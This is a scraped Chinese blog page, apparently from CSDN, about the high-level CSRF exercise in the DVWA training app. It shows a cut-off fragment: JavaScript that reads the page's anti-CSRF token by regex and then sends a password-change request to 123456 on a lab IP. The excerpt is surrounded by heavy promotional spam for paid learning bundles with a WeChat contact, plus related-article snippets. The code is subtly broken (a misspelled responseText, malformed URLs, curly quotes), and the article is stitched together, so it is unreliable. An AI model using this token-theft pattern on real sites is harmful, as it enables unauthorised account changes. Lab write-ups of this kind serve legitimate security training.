DVWA中CSRF高级_dvwa csrf 高级,2024年最新原生网络安全开发的路该怎么走

最新推荐文章于 2024-05-12 04:22:38 发布
最新推荐文章于 2024-05-12 04:22:38 发布
阅读量839 收藏 18
点赞数 10
分类专栏: 2024年程序员学习 文章标签: csrf web安全 网络
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_58132019/article/details/137863346
版权

先自我介绍一下,小编浙江大学毕业,去过华为、字节跳动等大厂,目前阿里P7

深知大多数程序员,想要提升技能,往往是自己摸索成长,但自己不成体系的自学效果低效又漫长,而且极易碰到天花板技术停滞不前!

因此收集整理了一份《2024年最新网络安全全套学习资料》,初衷也很简单,就是希望能够帮助到想自学提升又不知道该从何学起的朋友。
img
img
img
img
img
img

既有适合小白学习的零基础资料,也有适合3年以上经验的小伙伴深入学习提升的进阶课程,涵盖了95%以上网络安全知识点,真正体系化!

由于文件比较多,这里只是将部分目录截图出来,全套包含大厂面经、学习笔记、源码讲义、实战项目、大纲路线、讲解视频,并且后续会持续更新

如果你需要这些资料,可以添加V获取:vip204888 (备注网络安全)
img

正文


页面,然后从相应中取得Token(通过正则表达式提取)取得后在将Token和新密发一起发送给

http:192.168.112.188/dvwa/vulnerabilities/csrf/?password_new=123456&password_conf=123456&Change=Change


页面完成密码修改


(4)先构造一个Javascript原生代码发送AJAX请求的代码

var tokenUrl=‘http://192.168.112.188/dvwa/vulnerabilities/csrf/’;
var count = 0;
//实例化XMLHttpRequest,用于发送AJAX请求
xmlhttp = new XMLHttpRequest();
//当请求状态发生变化时,触发执行代码
xmlhttp.onreadystatechange = function(){
   //状态码0:请求未初始化,1:服务器连接已建立,2请求已接收,3请求处理中,4请求已完成,且相应已就绪
   if(xmlhttp.readyState == 4&&xmlhttp.status == 200)
  {
       //取得请求的响应,并从响应中通过正则提取Token
       var text = xmlhttp.responesText;
       var regex = /user_token’value=‘(.*?)’ />/;
       var match = text.match(regex);
       //alert(match[1]);
       var token = match[1];
       //发送修改密码的语法
       var changeUrl=‘http:192.168.112.188/dvwa/vulnerabilities/csrf/?user_token=’+token+‘& password_new=123456&password_conf=123456&Change=Change’;
       if(count == 0){
           count = 1; //只发送一次,否则会多次发送
           xmlhttp.open(“GET”,changeUrl,false); //false代表同步方式发送
           xmlhttp.send();
      }
  }
};
xmlhttp.open(“GET”,tokenUrl,false);
xmlhttp.send();


将上述代码放置在攻击服务器上


想办法将上述JS代码嵌入到被攻击者服务器上即可完成。(High级别无法实现)





在high级别中,屏蔽了<script>标签,所以无法直接利用。





本人从事网路安全工作12年,曾在2个大厂工作过,安全服务、售后服务、售前、攻防比赛、安全讲师、销售经理等职位都做过,对这个行业了解比较全面。


最近遍览了各种网络安全类的文章,内容参差不齐,其中不伐有大佬倾力教学,也有各种不良机构浑水摸鱼,在收到几条私信,发现大家对一套完整的系统的网络安全从学习路线到学习资料,甚至是工具有着不小的需求。


最后,我将这部分内容融会贯通成了一套282G的网络安全资料包,所有类目条理清晰,知识点层层递进,需要的小伙伴可以点击下方小卡片领取哦!下面就开始进入正题,如何从一个萌新一步一步进入网络安全行业。


![](https://img-blog.csdnimg.cn/img_convert/311903982dea1d8a5d2c98fc271b5b41.jpeg)



### 学习路线图


 其中最为瞩目也是最为基础的就是网络安全学习路线图,这里我给大家分享一份打磨了3个月,已经更新到4.0版本的网络安全学习路线图。


相比起繁琐的文字,还是生动的视频教程更加适合零基础的同学们学习,这里也是整理了一份与上述学习路线一一对应的网络安全视频教程。


![](https://img-blog.csdnimg.cn/img_convert/1ddfaf7dc5879b1120e31fafa1ad4dc7.jpeg)


#### 网络安全工具箱


当然,当你入门之后,仅仅是视频教程已经不能满足你的需求了,你肯定需要学习各种工具的使用以及大量的实战项目,这里也分享一份**我自己整理的网络安全入门工具以及使用教程和实战。**


![](https://img-blog.csdnimg.cn/img_convert/bcd1787ce996787388468bb227d8f959.jpeg)


#### 项目实战


最后就是项目实战,这里带来的是**SRC资料&HW资料**,毕竟实战是检验真理的唯一标准嘛~


![](https://img-blog.csdnimg.cn/img_convert/35fc46df24091ce3c9a5032a9919b755.jpeg)


#### 面试题


归根结底,我们的最终目的都是为了就业,所以这份结合了多位朋友的亲身经验打磨的面试题合集你绝对不能错过!

**网上学习资料一大堆,但如果学到的知识不成体系,遇到问题时只是浅尝辄止,不再深入研究,那么很难做到真正的技术提升。**

**需要这份系统化的资料的朋友,可以添加V获取:vip204888 (备注网络安全)**
![img](https://img-blog.csdnimg.cn/img_convert/79d1f9dc281b00df2f4ecd34517ecf3f.png)

**一个人可以走的很快,但一群人才能走的更远!不论你是正从事IT行业的老鸟或是对IT行业感兴趣的新人,都欢迎加入我们的的圈子(技术交流、学习资源、职场吐槽、大厂内推、面试辅导),让我们一起学习成长!**

..(img-OnhTesL6-1713321619364)]

**一个人可以走的很快,但一群人才能走的更远!不论你是正从事IT行业的老鸟或是对IT行业感兴趣的新人,都欢迎加入我们的的圈子(技术交流、学习资源、职场吐槽、大厂内推、面试辅导),让我们一起学习成长!**
前端之路..
关注
  • 10
    点赞
  • 18
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
DVWA-CSRF跨站请求伪造 -High级别
xmj818719的博客
02-27 1427
基础知识介绍csrf攻击流程 实验环境: CSRF模拟攻击环境(这里是内网环境,公网只需要对端口进行映射即可,其他操作同理) CentOS7 DVWA服务器(模拟转账系统) 192.168.0.9 kali 黑客(攻击者) 192.168.0.2 Win10 用户(受害者) 192.168.0.5 1使用条件: 1、使用关闭XSS的chrome浏览器 新建chrome浏览器快捷方式 “C:\Program Files (x86)\Google\Chrome\chrome-xss.e
DVWACSRF
RexHa的博客
09-30 7015
CSRF,跨站域请求伪造,通常攻击者会伪造一个场景(例如一条链接),来诱使用户点击,用户一旦点击,黑客的攻击目的也就达到了,他可以盗用你的身份,以你的名义发送恶意请求。
2024年网络安全最新DVWACSRF高级_dvwa csrf 高级(2),阿里网络安全开发手册
最新发布
2401_84132644的博客
05-12 795
Python编程学习,学习内容包含:语法、正则、文件、 网络、多线程等常用库,推荐《Python核心编程》,不要看完;在实际的渗透测试过程,面对复杂多变的网络环境,当常用工具不能满足实际需求的时候,往往需要对现有工具进行扩展,或者编写符合我们要求的工具、自动化脚本,这个时候就需要具备一定的编程能力。恭喜你,如果学到这里,你基本可以从事一份网络安全相关的工作,比如渗透测试、Web 渗透、安全服务、安全分析等岗位;③漏洞扫描、漏洞利用、原理,利用方法、工具(MSF)、绕过IDS和反病毒侦察。
DVWA】14. CSRF(High+Impossible)
Zichel77的博客
12-21 1031
因为该请求是get请求,所以token验证会被放在请求URL,我们随便输入密码验证一下,可以看到,在请求的URL最末尾加入了token。除了我们输入的新密码和确认密码之外,还有user-token的参数被我们捕获,以上框出来的内容都是URL里面出现的,真正需要的是发送后的不回显的token。所以现在要想进行CSRF攻击就必须获取到用户的token,而要想获取到 token 就必须利用用户的 cookie 值去访问修改密码的页面,然后截取服务器返回的token值。函数来对密码进行转义。
零基础怎么学python?(1)
2401_84302655的博客
04-30 780
如果对Python感兴趣的话,可以试试我的学习方法以及相关的学习资料Python所有方向的学习线Python所有方向的技术点做的整理,形成各个领域的知识点汇总,它的用处就在于,你可以按照上面的知识点去找对应的学习资源,保证自己学得较为全面。二、Python必备开发工具。
Dvwa csrf之low、medium、high级别漏洞实战
永不垂头的博客
08-11 4945
Dvwa csrf高级别漏洞实战 Low 源代码如下: GLOBALS:引用全局作用域可用的全部变量。GLOBALS :引用全局作用域可用的全部变量。GLOBALS:引用全局作用域可用的全部变量。GLOBALS 这种全局变量用于在 PHP 脚本的任意位置访问全局变量(从函数或方法均可)。PHP 在名为 $GLOBALS[index] 的数组存储了所有全局变量。变量的名字就是数组的键。 从源代码可以看出这里只是对用户输入的两个密码进行判断,看是否相等。不相等就提示密码不匹配。 相等的话,查看
pikachu,dvwacsrf详细步骤
05-17
初学者可以参考
PHP、Apache环境部署DVWA(综合靶场)
01-08
PHP、Apache环境部署DVWA网络安全综合靶场),包括密码爆破、SQL注入、文件上传、文件包含、XSS、CSRF等等场景
跨站攻击(XSS+CSRF).docx
01-05
利用Kali Linux对DVWA的Reflected Cross Site Scripting (XSS)/Stored Cross Site Scripting (XSS)模块,包括: 1) Low等级;(15分) 2) Medium等级;(10分) 3) High级别;(10分) 4) Impossible等级的机制以及...
web安全-dvwa实战手
07-05
CSRF(跨站请求伪造):解释CSRF攻击是如何通过伪装用户合法请求来执行未授权的操作,以及如何在DVWA模拟和防御此类攻击。 3。文件包含:说明文件包含漏洞是如何允许攻击者包含或执行系统的文件,从而可能引发未...
DVWA的靶场安装教学
06-08
3. Cross-Site Request Forgery(CSRF):DVWA靶场提供了CSRF漏洞测试场景,用户可以学习如何进行CSRF攻击和防御。 五、结语 DVWA靶场安装教学是学习Web应用程序安全测试的不二之选。通过DVWA靶场,用户可以学习和...
DVWA-CSRF跨站请求伪造全等级绕过方法
面向感觉挖洞,背向对象编程。欢迎关注VX公众号:EureKa安全团队
12-17 3598
CSRF--DVWA全等级绕过前言一、low级别二、Medium级别三、High级别四、Impossible级别总结 前言 CSRF,跨站请求伪造,Cross-site request forgery 受害者:用户在当前已登录的Web应用程序上执行非本意的操作。 攻击者:攻击者欺骗浏览器,让其以受害者的名义执行自己想要的操作。 一、low级别 二、Medium级别 三、High级别 四、Impossible级别 总结     本站所有文章均为原创,欢迎转载,请注明文章
DVWACSRF高级
m0_73896875的博客
07-11 261
(2)再次访问CSRF页面Token值发生了变化,可以确定DVWA生成Token的机制是每次不一样/页面,然后从相应取得Token(通过正则表达式提取)取得后在将Token和新密发一起发送给。处理方式:先切换到Low级,在留言本里注入以下脚本,然后在切换到High级,直接触发改密。(High级别无法实现)(4)先构造一个Javascript原生代码发送AJAX请求的代码。(1)访问CSRF页面,在页面的源代码可以看到生成的Token。在high级别,屏蔽了标签,所以无法直接利用。
代码审计—DVWACSRF—high
王嘟嘟的博客
10-31 954
0x00 前言 如饥似渴的学习ing。 你可能需要看看: https://blog.csdn.net/qq_36869808/article/details/83029980 0x01 start 1.黑盒测试 发现这里带了Token。 说实话我不会利用,哈哈。直接白盒看看吧。 白盒 通过和这个来判断Token,但是这里网上都说可以通过xss来获取session来进行判断。然后进行伪造等等,但...
dvwa_csrf攻击_high
weixin_30492601的博客
02-18 325
dvwa_csrf攻击_high <script type="text/javascript"> function attack() { document.getElementsByName('user_token')[0].value=document.getElementById("hack")....
DVWA1.10_CSRF
whime
07-11 324
LOW 服务器收到提交的新密码和确认密码之后,比较是否相同,相同则修改密码,没有任何防护机制。此处可以简单构造带有参数的链接诱导用户点击: http://192.168.29.128/DVWA-master/vulnerabilities/csrf/?password_new=password&password_conf=password&Change=Change# 但是点击之后会出现修改成功页面,用户很容易发现密码已经被修改了。 攻击者还可以诱导用户访问特定页面,将链接隐藏在标签.
DVWACSRF-High跨站请求伪造高级
qq_39330735的博客
02-09 425
DVWACSRF-High跨站请求伪造高级,通过XSS漏洞联合使用的方法来实现。
DVWA靶场之CSRF通关详解
qq_62169455的博客
06-27 2403
CSRF的形成原因主要是由于Web应用程序没有充分验证请求来源的问题。正常的请求必须携带正确的Cookie信息,而攻击者可以构造一个恶意网站,在其包含一个发送CSRF请求的链接或表单,当用户访问这个网站时,浏览器会自动发送CSRF请求到被攻击的网站,从而实现攻击。这里查看源码,与刚刚的low等级比较发现,这里只有一个等级发生了改变,即在传入密码和确认密码参数前先进行了一个if语句的判断,判断里面的内容主要是验证这个访问请求是否从dvwa网站本身发起的,如果不是这个网站发起的请求,后面的操作就不执行。
CSRF(三)dvwa靶场实验
03-04 361
CSRF(三)dvwa靶场实验
dvwa+csrf高级
10-14
DVWA(Damn Vulnerable Web Application)是一个用于练习Web应用程序渗透测试的漏洞演示平台,而CSRF(Cross-Site Request Forgery)则是一种常见的Web应用程序安全漏洞。在DVWA,可以通过模拟CSRF攻击来学习和...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值